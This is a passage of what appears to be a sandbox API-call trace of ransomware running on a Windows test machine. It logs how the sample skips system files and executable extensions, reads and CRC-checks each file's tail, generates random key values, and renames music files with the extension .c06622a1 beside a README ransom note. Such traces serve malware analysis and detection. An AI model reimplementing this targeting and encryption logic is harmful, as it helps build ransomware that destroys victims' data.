yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 0x10 [0150.782] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45c00f0 [0150.782] wcscpy (in: _Dest=0x45c00f0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" [0150.782] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned 0x71 [0150.782] wcscpy (in: _Dest=0x45c01d4, _Source="YK12.m4a" | out: _Dest="YK12.m4a") returned="YK12.m4a" [0150.782] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a", dwFileAttributes=0x80) returned 1 [0150.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\yk12.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0150.787] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.787] ReadFile (in: hFile=0x610, lpBuffer=0x3fdef4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fdf84, lpOverlapped=0x0 | out: lpBuffer=0x3fdef4*, lpNumberOfBytesRead=0x3fdf84*=0x90, lpOverlapped=0x0) returned 1 [0150.788] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fdef4, Length=0x80) returned 0xb8b9b002 [0150.788] RtlComputeCrc32 (PartialCrc=0xb002, Buffer=0x3fdef4, Length=0x80) returned 0x7084c22c [0150.788] RtlComputeCrc32 (PartialCrc=0xc22c, Buffer=0x3fdef4, Length=0x80) returned 0x1a3248 [0150.788] RtlComputeCrc32 (PartialCrc=0x3248, Buffer=0x3fdef4, Length=0x80) returned 0x30f17eb6 [0150.788] RtlComputeCrc32 (PartialCrc=0x7eb6, Buffer=0x3fdef4, Length=0x80) returned 0x760bfb68 [0150.788] CloseHandle (hObject=0x610) returned 1 [0150.789] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45d00f8 [0150.789] wcscpy (in: _Dest=0x45d00f8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a" [0150.789] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a") returned 0x7a [0150.789] wcscpy (in: _Dest=0x45d01ec, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.789] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\yk12.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\yk12.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\YK12.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\yk12.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x610 [0150.795] CreateIoCompletionPort (FileHandle=0x610, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.795] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6144a08b [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7893a4a1 [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x10c84a69 [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4113da54 [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3809b001 [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c812ece [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x37365c61 [0150.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a215bdc [0150.804] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x31b387a7 [0150.804] RtlComputeCrc32 (PartialCrc=0x87a7, Buffer=0x4a60094, Length=0x80) returned 0x84357c97 [0150.804] RtlComputeCrc32 (PartialCrc=0x7c97, Buffer=0x4a60094, Length=0x80) returned 0x4c647183 [0150.804] RtlComputeCrc32 (PartialCrc=0x7183, Buffer=0x4a60094, Length=0x80) returned 0x4c56c06b [0150.804] RtlComputeCrc32 (PartialCrc=0xc06b, Buffer=0x4a60094, Length=0x80) returned 0x37cdceaf [0150.804] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0150.805] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45c00f0) returned 1 [0150.805] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45d00f8) returned 1 [0150.805] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0150.805] FindClose (in: hFindFile=0x2db8880 | out: hFindFile=0x2db8880) returned 1 [0150.805] _wcsicmp (_Str1="backup", _Str2="kNf4JZn") returned -9 [0150.805] wcslen (_String="backup") returned 0x6 [0150.805] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.805] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.805] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x341e1c60, ftCreationTime.dwHighDateTime=0x1d5dd6d, ftLastAccessTime.dwLowDateTime=0xca8ba20, ftLastAccessTime.dwHighDateTime=0x1d5e4dc, ftLastWriteTime.dwLowDateTime=0xca8ba20, ftLastWriteTime.dwHighDateTime=0x1d5e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x6c78, dwReserved0=0x0, dwReserved1=0x0, cFileName="OsRVCyX.wav", cAlternateFileName="")) returned 1 [0150.805] _wcsicmp (_Str1="OsRVCyX.wav", _Str2="README.c06622a1.TXT") returned -3 [0150.805] wcsstr (_Str="OsRVCyX.wav", _SubStr="README") returned 0x0 [0150.805] _wcsicmp (_Str1="autorun.inf", _Str2="OsRVCyX.wav") returned -14 [0150.805] wcslen (_String="autorun.inf") returned 0xb [0150.805] _wcsicmp (_Str1="boot.ini", _Str2="OsRVCyX.wav") returned -13 [0150.805] wcslen (_String="boot.ini") returned 0x8 [0150.805] _wcsicmp (_Str1="bootfont.bin", _Str2="OsRVCyX.wav") returned -13 [0150.805] wcslen (_String="bootfont.bin") returned 0xc [0150.805] _wcsicmp (_Str1="bootsect.bak", _Str2="OsRVCyX.wav") returned -13 [0150.805] wcslen (_String="bootsect.bak") returned 0xc [0150.805] _wcsicmp (_Str1="desktop.ini", _Str2="OsRVCyX.wav") returned -11 [0150.805] wcslen (_String="desktop.ini") returned 0xb [0150.805] _wcsicmp (_Str1="iconcache.db", _Str2="OsRVCyX.wav") returned -6 [0150.805] wcslen (_String="iconcache.db") returned 0xc [0150.805] _wcsicmp (_Str1="ntldr", _Str2="OsRVCyX.wav") returned -1 [0150.805] wcslen (_String="ntldr") returned 0x5 [0150.805] _wcsicmp (_Str1="ntuser.dat", _Str2="OsRVCyX.wav") returned -1 [0150.806] wcslen (_String="ntuser.dat") returned 0xa [0150.806] _wcsicmp (_Str1="ntuser.dat.log", _Str2="OsRVCyX.wav") returned -1 [0150.806] wcslen (_String="ntuser.dat.log") returned 0xe [0150.806] _wcsicmp (_Str1="ntuser.ini", _Str2="OsRVCyX.wav") returned -1 [0150.806] wcslen (_String="ntuser.ini") returned 0xa [0150.806] _wcsicmp (_Str1="thumbs.db", _Str2="OsRVCyX.wav") returned 5 [0150.806] wcslen (_String="thumbs.db") returned 0x9 [0150.806] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0150.806] wcslen (_String="386") returned 0x3 [0150.806] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0150.806] wcslen (_String="adv") returned 0x3 [0150.806] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0150.806] wcslen (_String="ani") returned 0x3 [0150.806] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0150.806] wcslen (_String="bat") returned 0x3 [0150.806] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0150.806] wcslen (_String="bin") returned 0x3 [0150.806] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0150.806] wcslen (_String="cab") returned 0x3 [0150.806] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0150.806] wcslen (_String="cmd") returned 0x3 [0150.806] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0150.806] wcslen (_String="com") returned 0x3 [0150.806] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0150.806] wcslen (_String="cpl") returned 0x3 [0150.806] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0150.806] wcslen (_String="cur") returned 0x3 [0150.806] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0150.806] wcslen (_String="deskthemepack") returned 0xd [0150.806] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0150.806] wcslen (_String="diagcab") returned 0x7 [0150.806] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0150.806] wcslen (_String="diagcfg") returned 0x7 [0150.807] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0150.807] wcslen (_String="diagpkg") returned 0x7 [0150.807] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0150.807] wcslen (_String="dll") returned 0x3 [0150.807] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0150.807] wcslen (_String="drv") returned 0x3 [0150.807] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0150.807] wcslen (_String="exe") returned 0x3 [0150.807] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0150.807] wcslen (_String="hlp") returned 0x3 [0150.807] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0150.807] wcslen (_String="icl") returned 0x3 [0150.807] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0150.807] wcslen (_String="icns") returned 0x4 [0150.807] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0150.807] wcslen (_String="ico") returned 0x3 [0150.807] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0150.807] wcslen (_String="ics") returned 0x3 [0150.807] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0150.807] wcslen (_String="idx") returned 0x3 [0150.807] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0150.807] wcslen (_String="ldf") returned 0x3 [0150.807] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0150.807] wcslen (_String="lnk") returned 0x3 [0150.807] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0150.807] wcslen (_String="mod") returned 0x3 [0150.807] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0150.807] wcslen (_String="mpa") returned 0x3 [0150.807] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0150.807] wcslen (_String="msc") returned 0x3 [0150.807] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0150.807] wcslen (_String="msp") returned 0x3 [0150.807] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0150.807] wcslen (_String="msstyles") returned 0x8 [0150.808] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0150.808] wcslen (_String="msu") returned 0x3 [0150.808] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0150.808] wcslen (_String="nls") returned 0x3 [0150.808] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0150.808] wcslen (_String="nomedia") returned 0x7 [0150.808] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0150.808] wcslen (_String="ocx") returned 0x3 [0150.808] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0150.808] wcslen (_String="prf") returned 0x3 [0150.808] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0150.808] wcslen (_String="ps1") returned 0x3 [0150.808] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0150.808] wcslen (_String="rom") returned 0x3 [0150.808] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0150.808] wcslen (_String="rtp") returned 0x3 [0150.808] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0150.808] wcslen (_String="scr") returned 0x3 [0150.808] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0150.808] wcslen (_String="shs") returned 0x3 [0150.808] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0150.808] wcslen (_String="spl") returned 0x3 [0150.808] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0150.808] wcslen (_String="sys") returned 0x3 [0150.808] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0150.808] wcslen (_String="theme") returned 0x5 [0150.808] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0150.808] wcslen (_String="themepack") returned 0x9 [0150.808] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0150.808] wcslen (_String="wpx") returned 0x3 [0150.808] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0150.808] wcslen (_String="lock") returned 0x4 [0150.808] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0150.809] wcslen (_String="key") returned 0x3 [0150.809] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0150.809] wcslen (_String="hta") returned 0x3 [0150.809] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0150.809] wcslen (_String="msi") returned 0x3 [0150.809] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0150.809] wcslen (_String="pdb") returned 0x3 [0150.809] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0150.809] wcslen (_String="sql") returned 0x3 [0150.809] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0150.809] wcslen (_String="sqlite") returned 0x6 [0150.809] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia")) returned 0x10 [0150.809] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0150.809] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA" [0150.809] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA") returned 0x69 [0150.809] wcscpy (in: _Dest=0x45901ac, _Source="OsRVCyX.wav" | out: _Dest="OsRVCyX.wav") returned="OsRVCyX.wav" [0150.809] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav", dwFileAttributes=0x80) returned 1 [0150.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\osrvcyx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0150.822] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.822] ReadFile (in: hFile=0x670, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0150.823] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x7c1014e2 [0150.823] RtlComputeCrc32 (PartialCrc=0x14e2, Buffer=0x3fe174, Length=0x80) returned 0x81d21f72 [0150.823] RtlComputeCrc32 (PartialCrc=0x1f72, Buffer=0x3fe174, Length=0x80) returned 0xa86cc61e [0150.823] RtlComputeCrc32 (PartialCrc=0xc61e, Buffer=0x3fe174, Length=0x80) returned 0x9adc4af2 [0150.823] RtlComputeCrc32 (PartialCrc=0x4af2, Buffer=0x3fe174, Length=0x80) returned 0xf45cdfed [0150.823] CloseHandle (hObject=0x670) returned 1 [0150.823] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0150.823] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav" [0150.823] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav") returned 0x75 [0150.823] wcscpy (in: _Dest=0x45a01ca, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.823] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\osrvcyx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\osrvcyx.wav.c06622a1"), dwFlags=0x8) returned 1 [0150.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\OsRVCyX.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\osrvcyx.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0150.857] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.857] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0150.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x61c80d97 [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62679527 [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x453e1f3a [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x537cd503 [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d0e431d [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1448482e [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b7b5e67 [0150.862] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a8a0eac [0150.865] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x53811812 [0150.865] RtlComputeCrc32 (PartialCrc=0x1812, Buffer=0x2f30094, Length=0x80) returned 0x27cbf967 [0150.865] RtlComputeCrc32 (PartialCrc=0xf967, Buffer=0x2f30094, Length=0x80) returned 0x825f7ad5 [0150.865] RtlComputeCrc32 (PartialCrc=0x7ad5, Buffer=0x2f30094, Length=0x80) returned 0xe940724d [0150.865] RtlComputeCrc32 (PartialCrc=0x724d, Buffer=0x2f30094, Length=0x80) returned 0x91c70c63 [0150.865] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.865] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0150.865] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0150.865] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa74fa390, ftCreationTime.dwHighDateTime=0x1d5e4dc, ftLastAccessTime.dwLowDateTime=0xf71d8a90, ftLastAccessTime.dwHighDateTime=0x1d5e761, ftLastWriteTime.dwLowDateTime=0xf71d8a90, ftLastWriteTime.dwHighDateTime=0x1d5e761, nFileSizeHigh=0x0, nFileSizeLow=0xd8c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="qWi.m4a", cAlternateFileName="")) returned 1 [0150.865] _wcsicmp (_Str1="qWi.m4a", _Str2="README.c06622a1.TXT") returned -1 [0150.865] wcsstr (_Str="qWi.m4a", _SubStr="README") returned 0x0 [0150.865] _wcsicmp (_Str1="autorun.inf", _Str2="qWi.m4a") returned -16 [0150.865] wcslen (_String="autorun.inf") returned 0xb [0150.865] _wcsicmp (_Str1="boot.ini", _Str2="qWi.m4a") returned -15 [0150.865] wcslen (_String="boot.ini") returned 0x8 [0150.865] _wcsicmp (_Str1="bootfont.bin", _Str2="qWi.m4a") returned -15 [0150.865] wcslen (_String="bootfont.bin") returned 0xc [0150.865] _wcsicmp (_Str1="bootsect.bak", _Str2="qWi.m4a") returned -15 [0150.865] wcslen (_String="bootsect.bak") returned 0xc [0150.865] _wcsicmp (_Str1="desktop.ini", _Str2="qWi.m4a") returned -13 [0150.865] wcslen (_String="desktop.ini") returned 0xb [0150.865] _wcsicmp (_Str1="iconcache.db", _Str2="qWi.m4a") returned -8 [0150.865] wcslen (_String="iconcache.db") returned 0xc [0150.865] _wcsicmp (_Str1="ntldr", _Str2="qWi.m4a") returned -3 [0150.865] wcslen (_String="ntldr") returned 0x5 [0150.865] _wcsicmp (_Str1="ntuser.dat", _Str2="qWi.m4a") returned -3 [0150.865] wcslen (_String="ntuser.dat") returned 0xa [0150.865] _wcsicmp (_Str1="ntuser.dat.log", _Str2="qWi.m4a") returned -3 [0150.865] wcslen (_String="ntuser.dat.log") returned 0xe [0150.866] _wcsicmp (_Str1="ntuser.ini", _Str2="qWi.m4a") returned -3 [0150.866] wcslen (_String="ntuser.ini") returned 0xa [0150.866] _wcsicmp (_Str1="thumbs.db", _Str2="qWi.m4a") returned 3 [0150.866] wcslen (_String="thumbs.db") returned 0x9 [0150.866] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.866] wcslen (_String="386") returned 0x3 [0150.866] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.866] wcslen (_String="adv") returned 0x3 [0150.866] 